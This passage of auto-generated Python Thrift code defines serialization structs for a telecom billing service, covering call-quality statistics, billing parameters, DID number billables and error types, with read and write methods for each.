oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('UpdatePlanMinutesMessage')
if self.i_account is not None:
oprot.writeFieldBegin('i_account', TType.I64, 1)
oprot.writeI64(self.i_account)
oprot.writeFieldEnd()
if self.i_service_plan is not None:
oprot.writeFieldBegin('i_service_plan', TType.I64, 2)
oprot.writeI64(self.i_service_plan)
oprot.writeFieldEnd()
if self.delta is not None:
oprot.writeFieldBegin('delta', TType.DOUBLE, 3)
oprot.writeDouble(self.delta)
oprot.writeFieldEnd()
if self.chargeable_seconds is not None:
oprot.writeFieldBegin('chargeable_seconds', TType.DOUBLE, 4)
oprot.writeDouble(self.chargeable_seconds)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class ConnectionQualityStats(object):
"""
Attributes:
- i_connection_quality_stats
- i_connection
- tstamp
- asr
- acd
- action
"""
thrift_spec = (
None, # 0
(1, TType.I64, 'i_connection_quality_stats', None, None, ), # 1
(2, TType.I64, 'i_connection', None, None, ), # 2
(3, TType.I64, 'tstamp', None, None, ), # 3
(4, TType.DOUBLE, 'asr', None, None, ), # 4
(5, TType.I32, 'acd', None, None, ), # 5
(6, TType.STRING, 'action', 'UTF8', None, ), # 6
)
def __init__(self, i_connection_quality_stats=None, i_connection=None, tstamp=None, asr=None, acd=None, action=None,):
self.i_connection_quality_stats = i_connection_quality_stats
self.i_connection = i_connection
self.tstamp = tstamp
self.asr = asr
self.acd = acd
self.action = action
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec), iprot.string_length_limit, iprot.container_length_limit)
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I64:
self.i_connection_quality_stats = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.I64:
self.i_connection = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.I64:
self.tstamp = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.DOUBLE:
self.asr = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 5:
if ftype == TType.I32:
self.acd = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 6:
if ftype == TType.STRING:
self.action = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('ConnectionQualityStats')
if self.i_connection_quality_stats is not None:
oprot.writeFieldBegin('i_connection_quality_stats', TType.I64, 1)
oprot.writeI64(self.i_connection_quality_stats)
oprot.writeFieldEnd()
if self.i_connection is not None:
oprot.writeFieldBegin('i_connection', TType.I64, 2)
oprot.writeI64(self.i_connection)
oprot.writeFieldEnd()
if self.tstamp is not None:
oprot.writeFieldBegin('tstamp', TType.I64, 3)
oprot.writeI64(self.tstamp)
oprot.writeFieldEnd()
if self.asr is not None:
oprot.writeFieldBegin('asr', TType.DOUBLE, 4)
oprot.writeDouble(self.asr)
oprot.writeFieldEnd()
if self.acd is not None:
oprot.writeFieldBegin('acd', TType.I32, 5)
oprot.writeI32(self.acd)
oprot.writeFieldEnd()
if self.action is not None:
oprot.writeFieldBegin('action', TType.STRING, 6)
oprot.writeString(self.action.encode('utf-8') if sys.version_info[0] == 2 else self.action)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class RegisterError(TException):
"""
Attributes:
- cause
- i_call
"""
thrift_spec = (
None, # 0
(1, TType.I32, 'cause', None, None, ), # 1
(2, TType.I64, 'i_call', None, None, ), # 2
)
def __init__(self, cause=None, i_call=None,):
self.cause = cause
self.i_call = i_call
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec), iprot.string_length_limit, iprot.container_length_limit)
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I32:
self.cause = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.I64:
self.i_call = iprot.readI64()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('RegisterError')
if self.cause is not None:
oprot.writeFieldBegin('cause', TType.I32, 1)
oprot.writeI32(self.cause)
oprot.writeFieldEnd()
if self.i_call is not None:
oprot.writeFieldBegin('i_call', TType.I64, 2)
oprot.writeI64(self.i_call)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __str__(self):
return repr(self)
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class TryBackupError(TException):
thrift_spec = (
)
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec), iprot.string_length_limit, iprot.container_length_limit)
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('TryBackupError')
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __str__(self):
return repr(self)
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class EagainError(TException):
thrift_spec = (
)
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec), iprot.string_length_limit, iprot.container_length_limit)
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('EagainError')
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __str__(self):
return repr(self)
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class Billables(object):
"""
Attributes:
- free_seconds
- connect_fee
- price_1
- price_n
- interval_1
- interval_n
- post_call_surcharge
- grace_period
- prefix
- decimal_precision
- cost_round_up
"""
thrift_spec = (
None, # 0
(1, TType.I64, 'free_seconds', None, None, ), # 1
(2, TType.DOUBLE, 'connect_fee', None, None, ), # 2
(3, TType.DOUBLE, 'price_1', None, None, ), # 3
(4, TType.DOUBLE, 'price_n', None, None, ), # 4
(5, TType.I32, 'interval_1', None, None, ), # 5
(6, TType.I32, 'interval_n', None, None, ), # 6
(7, TType.DOUBLE, 'post_call_surcharge', None, None, ), # 7
(8, TType.I32, 'grace_period', None, None, ), # 8
(9, TType.STRING, 'prefix', 'UTF8', None, ), # 9
(10, TType.I32, 'decimal_precision', None, None, ), # 10
(11, TType.BOOL, 'cost_round_up', None, None, ), # 11
)
def __init__(self, free_seconds=None, connect_fee=None, price_1=None, price_n=None, interval_1=None, interval_n=None, post_call_surcharge=None, grace_period=None, prefix=None, decimal_precision=None, cost_round_up=None,):
self.free_seconds = free_seconds
self.connect_fee = connect_fee
self.price_1 = price_1
self.price_n = price_n
self.interval_1 = interval_1
self.interval_n = interval_n
self.post_call_surcharge = post_call_surcharge
self.grace_period = grace_period
self.prefix = prefix
self.decimal_precision = decimal_precision
self.cost_round_up = cost_round_up
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec), iprot.string_length_limit, iprot.container_length_limit)
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I64:
self.free_seconds = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.DOUBLE:
self.connect_fee = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.DOUBLE:
self.price_1 = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.DOUBLE:
self.price_n = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 5:
if ftype == TType.I32:
self.interval_1 = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 6:
if ftype == TType.I32:
self.interval_n = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 7:
if ftype == TType.DOUBLE:
self.post_call_surcharge = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 8:
if ftype == TType.I32:
self.grace_period = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 9:
if ftype == TType.STRING:
self.prefix = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 10:
if ftype == TType.I32:
self.decimal_precision = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 11:
if ftype == TType.BOOL:
self.cost_round_up = iprot.readBool()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('Billables')
if self.free_seconds is not None:
oprot.writeFieldBegin('free_seconds', TType.I64, 1)
oprot.writeI64(self.free_seconds)
oprot.writeFieldEnd()
if self.connect_fee is not None:
oprot.writeFieldBegin('connect_fee', TType.DOUBLE, 2)
oprot.writeDouble(self.connect_fee)
oprot.writeFieldEnd()
if self.price_1 is not None:
oprot.writeFieldBegin('price_1', TType.DOUBLE, 3)
oprot.writeDouble(self.price_1)
oprot.writeFieldEnd()
if self.price_n is not None:
oprot.writeFieldBegin('price_n', TType.DOUBLE, 4)
oprot.writeDouble(self.price_n)
oprot.writeFieldEnd()
if self.interval_1 is not None:
oprot.writeFieldBegin('interval_1', TType.I32, 5)
oprot.writeI32(self.interval_1)
oprot.writeFieldEnd()
if self.interval_n is not None:
oprot.writeFieldBegin('interval_n', TType.I32, 6)
oprot.writeI32(self.interval_n)
oprot.writeFieldEnd()
if self.post_call_surcharge is not None:
oprot.writeFieldBegin('post_call_surcharge', TType.DOUBLE, 7)
oprot.writeDouble(self.post_call_surcharge)
oprot.writeFieldEnd()
if self.grace_period is not None:
oprot.writeFieldBegin('grace_period', TType.I32, 8)
oprot.writeI32(self.grace_period)
oprot.writeFieldEnd()
if self.prefix is not None:
oprot.writeFieldBegin('prefix', TType.STRING, 9)
oprot.writeString(self.prefix.encode('utf-8') if sys.version_info[0] == 2 else self.prefix)
oprot.writeFieldEnd()
if self.decimal_precision is not None:
oprot.writeFieldBegin('decimal_precision', TType.I32, 10)
oprot.writeI32(self.decimal_precision)
oprot.writeFieldEnd()
if self.cost_round_up is not None:
oprot.writeFieldBegin('cost_round_up', TType.BOOL, 11)
oprot.writeBool(self.cost_round_up)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class AccountBillables(object):
"""
Attributes:
- bparams
- area_name
- i_commission_agent
- commission_size
- i_wholesaler
- fresh_balance
- plan_only
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'bparams', (Billables, Billables.thrift_spec), None, ), # 1
(2, TType.STRUCT, 'area_name', (NullString, NullString.thrift_spec), None, ), # 2
(3, TType.STRUCT, 'i_commission_agent', (NullInt64, NullInt64.thrift_spec), None, ), # 3
(4, TType.DOUBLE, 'commission_size', None, None, ), # 4
(5, TType.I64, 'i_wholesaler', None, None, ), # 5
(6, TType.DOUBLE, 'fresh_balance', None, None, ), # 6
(7, TType.BOOL, 'plan_only', None, None, ), # 7
)
def __init__(self, bparams=None, area_name=None, i_commission_agent=None, commission_size=None, i_wholesaler=None, fresh_balance=None, plan_only=None,):
self.bparams = bparams
self.area_name = area_name
self.i_commission_agent = i_commission_agent
self.commission_size = commission_size
self.i_wholesaler = i_wholesaler
self.fresh_balance = fresh_balance
self.plan_only = plan_only
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec), iprot.string_length_limit, iprot.container_length_limit)
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.bparams = Billables()
self.bparams.read(iprot)
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRUCT:
self.area_name = NullString()
self.area_name.read(iprot)
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.STRUCT:
self.i_commission_agent = NullInt64()
self.i_commission_agent.read(iprot)
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.DOUBLE:
self.commission_size = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 5:
if ftype == TType.I64:
self.i_wholesaler = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 6:
if ftype == TType.DOUBLE:
self.fresh_balance = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 7:
if ftype == TType.BOOL:
self.plan_only = iprot.readBool()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('AccountBillables')
if self.bparams is not None:
oprot.writeFieldBegin('bparams', TType.STRUCT, 1)
self.bparams.write(oprot)
oprot.writeFieldEnd()
if self.area_name is not None:
oprot.writeFieldBegin('area_name', TType.STRUCT, 2)
self.area_name.write(oprot)
oprot.writeFieldEnd()
if self.i_commission_agent is not None:
oprot.writeFieldBegin('i_commission_agent', TType.STRUCT, 3)
self.i_commission_agent.write(oprot)
oprot.writeFieldEnd()
if self.commission_size is not None:
oprot.writeFieldBegin('commission_size', TType.DOUBLE, 4)
oprot.writeDouble(self.commission_size)
oprot.writeFieldEnd()
if self.i_wholesaler is not None:
oprot.writeFieldBegin('i_wholesaler', TType.I64, 5)
oprot.writeI64(self.i_wholesaler)
oprot.writeFieldEnd()
if self.fresh_balance is not None:
oprot.writeFieldBegin('fresh_balance', TType.DOUBLE, 6)
oprot.writeDouble(self.fresh_balance)
oprot.writeFieldEnd()
if self.plan_only is not None:
oprot.writeFieldBegin('plan_only', TType.BOOL, 7)
oprot.writeBool(self.plan_only)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class CustomerBillables(object):
"""
Attributes:
- bparams
- area_name
- i_commission_agent
- commission_size
- i_customer
- i_wholesaler
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'bparams', (Billables, Billables.thrift_spec), None, ), # 1
(2, TType.STRUCT, 'area_name', (NullString, NullString.thrift_spec), None, ), # 2
(3, TType.STRUCT, 'i_commission_agent', (NullInt64, NullInt64.thrift_spec), None, ), # 3
(4, TType.DOUBLE, 'commission_size', None, None, ), # 4
(5, TType.I64, 'i_customer', None, None, ), # 5
(6, TType.I64, 'i_wholesaler', None, None, ), # 6
)
def __init__(self, bparams=None, area_name=None, i_commission_agent=None, commission_size=None, i_customer=None, i_wholesaler=None,):
self.bparams = bparams
self.area_name = area_name
self.i_commission_agent = i_commission_agent
self.commission_size = commission_size
self.i_customer = i_customer
self.i_wholesaler = i_wholesaler
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec), iprot.string_length_limit, iprot.container_length_limit)
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.bparams = Billables()
self.bparams.read(iprot)
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRUCT:
self.area_name = NullString()
self.area_name.read(iprot)
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.STRUCT:
self.i_commission_agent = NullInt64()
self.i_commission_agent.read(iprot)
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.DOUBLE:
self.commission_size = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 5:
if ftype == TType.I64:
self.i_customer = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 6:
if ftype == TType.I64:
self.i_wholesaler = iprot.readI64()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('CustomerBillables')
if self.bparams is not None:
oprot.writeFieldBegin('bparams', TType.STRUCT, 1)
self.bparams.write(oprot)
oprot.writeFieldEnd()
if self.area_name is not None:
oprot.writeFieldBegin('area_name', TType.STRUCT, 2)
self.area_name.write(oprot)
oprot.writeFieldEnd()
if self.i_commission_agent is not None:
oprot.writeFieldBegin('i_commission_agent', TType.STRUCT, 3)
self.i_commission_agent.write(oprot)
oprot.writeFieldEnd()
if self.commission_size is not None:
oprot.writeFieldBegin('commission_size', TType.DOUBLE, 4)
oprot.writeDouble(self.commission_size)
oprot.writeFieldEnd()
if self.i_customer is not None:
oprot.writeFieldBegin('i_customer', TType.I64, 5)
oprot.writeI64(self.i_customer)
oprot.writeFieldEnd()
if self.i_wholesaler is not None:
oprot.writeFieldBegin('i_wholesaler', TType.I64, 6)
oprot.writeI64(self.i_wholesaler)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class DidBillables(object):
"""
Attributes:
- bparams
- i_did
- did
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'bparams', (Billables, Billables.thrift_spec), None, ), # 1
(2, TType.I64, 'i_did', None, None, ), # 2
(3, TType.STRING, 'did', 'UTF8', None, ), # 3
)
def __init__(self, bparams=None, i_did=None, did=None,):
self.bparams = bparams
self.i_did = i_did
self.did = did
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec), iprot.string_length_limit, iprot.container_length_limit)
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.bparams = Billables()
self.bparams.read(iprot)
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.I64:
self.i_did = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.STRING:
self.did = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('DidBillables')
if self.bparams is not None:
oprot.writeFieldBegin('bparams', TType.STRUCT, 1)
self.bparams.write(oprot)
oprot.writeFieldEnd()
if self.i_did is not None:
oprot.writeFieldBegin('i_did', TType.I64, 2)
oprot.writeI64(self.i_did)
oprot.writeFieldEnd()
if self.did is not None:
oprot.writeFieldBegin('did', TType.STRING, 3)
oprot.writeString(self.did.encode('utf-8') if sys.version_info[0] == 2 else self.did)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class BuyingDidBillables(object):
"""
Attributes:
- bparams
- did
- i_connection
- i_did_authorization
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'bparams', (Billables, Billables.thrift_spec), None, ), # 1
(2, TType.STRING, 'did', 'UTF8', None, ), # 2
(3, TType.I64, 'i_connection', None, None, ), # 3
(4, TType.I64, 'i_did_authorization', None, None, ), # 4
)
def __init__(self, bparams=None, did=None, i_connection=None, i_did_authorization=None,):
self.bparams = bparams
self.did = did
self.i_connection = i_connection
self.i_did_authorization = i_did_authorization
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec), iprot.string_length_limit, iprot.container_length_limit)
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.bparams = Billables()
self.bparams.read(iprot)
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.did = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.I64:
self.i_connection = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.I64:
self.i_did_authorization = iprot.readI64()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('BuyingDidBillables')
if self.bparams is not None:
oprot.writeFieldBegin('bparams', TType.STRUCT, 1)
self.bparams.write(oprot)
oprot.writeFieldEnd()
if self.did is not None:
oprot.writeFieldBegin('did', TType.STRING, 2)
oprot.writeString(self.did.encode('utf-8') if sys.version_info[0] == 2 else self.did)
oprot.writeFieldEnd()
if self.i_connection is not None:
oprot.writeFieldBegin('i_connection', TType.I64, 3)
oprot.writeI64(self.i_connection)
oprot.writeFieldEnd()
if self.i_did_authorization is not None:
oprot.writeFieldBegin('i_did_authorization', TType.I64, 4)
oprot.writeI64(self.i_did_authorization)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class CustomerDidBillables(object):
"""
Attributes:
- bparams
- did
- i_customer
- i_did
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'bparams', (Billables, Billables.thrift_spec), None, ), # 1
(2, TType.STRING, 'did', 'UTF8', None, ), # 2
(3, TType.I64, 'i_customer', None, None, ), # 3
(4, TType.I64, 'i_did', None, None, ), # 4
)
def __init__(self, bparams=None, did=None, i_customer=None, i_did=None,):
self.bparams = bparams
self.did = did
self.i_customer = i_customer
self.i_did = i_did
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec), iprot.string_length_limit, iprot.container_length_limit)
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.bparams = Billables()
self.bparams.read(iprot)
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.did = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.I64:
self.i_customer = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.I64:
self.i_did = iprot.readI64()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('CustomerDidBillables')
if self.bparams is not None:
oprot.writeFieldBegin('bparams', TType.STRUCT, 1)
self.bparams.write(oprot)
oprot.writeFieldEnd()
if self.did is not None:
oprot.writeFieldBegin('did', TType.STRING, 2)
oprot.writeString(self.did.encode('utf-8') if sys.version_info[0] == 2 else self.did)
oprot.writeFieldEnd()
if self.i_customer is not None:
oprot.writeFieldBegin('i_customer', TType.I64, 3)
oprot.writeI64(self.i_customer)
oprot.writeFieldEnd()
if self.i_did is not None:
oprot.writeFieldBegin('i_did', TType.I64, 4)
oprot.writeI64(self.i_did)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class CreditTimes(object):
"""
Attributes:
- crtime_acct
- crtime_ext
- rtime
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'crtime_acct', (MonoTime, MonoTime.thrift_spec), None, ), # 1
(2, TType.STRUCT, 'crtime_ext', (MonoTime, MonoTime.thrift_spec), None, ), # 2
(3, TType.STRUCT, 'rtime', (MonoTime, MonoTime.thrift_spec), None, ), # 3
)
def __init__(self, crtime_acct=None, crtime_ext=None, rtime=None,):
self.crtime_acct = crtime_acct
